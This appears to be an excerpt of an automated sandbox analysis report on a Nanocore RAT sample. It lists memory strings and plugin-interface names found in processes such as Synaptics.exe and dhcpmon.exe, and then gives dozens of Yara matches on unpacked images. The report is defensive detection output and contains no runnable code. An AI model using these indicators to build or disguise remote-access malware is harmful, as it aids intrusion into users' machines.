            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.560829147.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.560829147.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe, 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe, 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Yara detected Nanocore RAT
            Source: Yara matchFile source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
